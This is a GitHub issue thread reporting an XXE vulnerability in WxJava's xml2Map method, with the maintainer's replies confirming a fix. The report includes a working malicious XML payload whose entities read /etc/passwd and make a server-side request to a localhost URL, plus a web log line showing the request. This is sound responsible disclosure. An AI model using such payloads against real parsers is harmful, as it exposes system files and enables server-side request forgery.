### ISSUE TITLE
xml2Map method vulnerable to XXE vulnerability

### ISSUE THREAD

**Issue by eric-therond-sonarsource** [binarywang/WxJava#1427]
Hello
thanks for maintaining this open-source project.

[In the past](https://github.com/Wechat-Group/WxJava/issues/903) you have already fixed XXE vulnerabilities and I would also suggest that you look at the SAXReader object used in the [XMLUtils class](https://github.com/Wechat-Group/WxJava/blob/cc8359b22c05590e1fcdd9982de20c4cf7616285/weixin-java-common/src/main/java/me/chanjar/weixin/common/util/XmlUtils.java#L33).

Currently, this XML parsing is not safe, it is possible to modify a little bit [the test example](https://github.com/Wechat-Group/WxJava/blob/cc8359b22c05590e1fcdd9982de20c4cf7616285/weixin-java-common/src/test/java/me/chanjar/weixin/common/util/XmlUtilsTest.java#L22) to add a malicious XML string (XXEs):
```
    String xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"+
      "<!DOCTYPE test [\n"+
      "<!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n"+
      "<!ENTITY xxe2 SYSTEM \"http://localhost/test.php\">\n"+
      "]>\n"+
      "<CopyrightCheckResult>\n" +
      "<Count>&xxe;</Count>\n" +
      "<ResultList>\n" +
      "<item>\n" +
      "<ArticleIdx>&xxe2;</ArticleIdx>\n" +
      "<UserDeclareState>0</UserDeclareState>\n" +
      "<AuditState>2</AuditState>\n" +
      "<OriginalArticleUrl><![CDATA[Url_1]]></OriginalArticleUrl>\n" +
      "<OriginalArticleType>1</OriginalArticleType>\n" +
      "<CanReprint>1</CanReprint>\n" +
      "<NeedReplaceContent>1</NeedReplaceContent>\n" +
      "<NeedShowReprintSource>1</NeedShowReprintSource>\n" +
      "</item>\n" +
      "<item>\n" +
      "<ArticleIdx>2</ArticleIdx>\n" +
      "<UserDeclareState>0</UserDeclareState>\n" +
      "<AuditState>2</AuditState>\n" +
      "<OriginalArticleUrl><![CDATA[Url_2]]></OriginalArticleUrl>\n" +
      "<OriginalArticleType>1</OriginalArticleType>\n" +
      "<CanReprint>1</CanReprint>\n" +
      "<NeedReplaceContent>1</NeedReplaceContent>\n" +
      "<NeedShowReprintSource>1</NeedShowReprintSource>\n" +
      "</item>\n" +
      "</ResultList>\n" +
      "<CheckState>2</CheckState>\n" +
      "</CopyrightCheckResult>";
```

The xml2Map() method will resolve external entities:

1) the first XXE reads the file /etc/passwd:
```
<!ENTITY xxe SYSTEM "file:///etc/passwd">
```
but it might be difficult for an attacker to exfiltrate data due to the way the xml data [is placed into the map](https://github.com/Wechat-Group/WxJava/blob/cc8359b22c05590e1fcdd9982de20c4cf7616285/weixin-java-common/src/main/java/me/chanjar/weixin/common/util/XmlUtils.java#L73).

2) the second XXE requests the webpage http://localhost/test.php:
```
<!ENTITY xxe2 SYSTEM "http://localhost/test.php">
```
and it's easy to verify "the attack" by checking the webserver localhost logs:
```
127.0.0.1 - - [04/Mar/2020:15:03:47 +0100] "GET /test.php HTTP/1.1" 200 197 "-" "Java/11.0.4"
```

Eric

**Comment by binarywang** [comment]
Thank you Eric for pointing it out.
We will look into it soon.

**Comment by binarywang** [comment]
It has been fixed in the new beta version of 3.7.4.B.
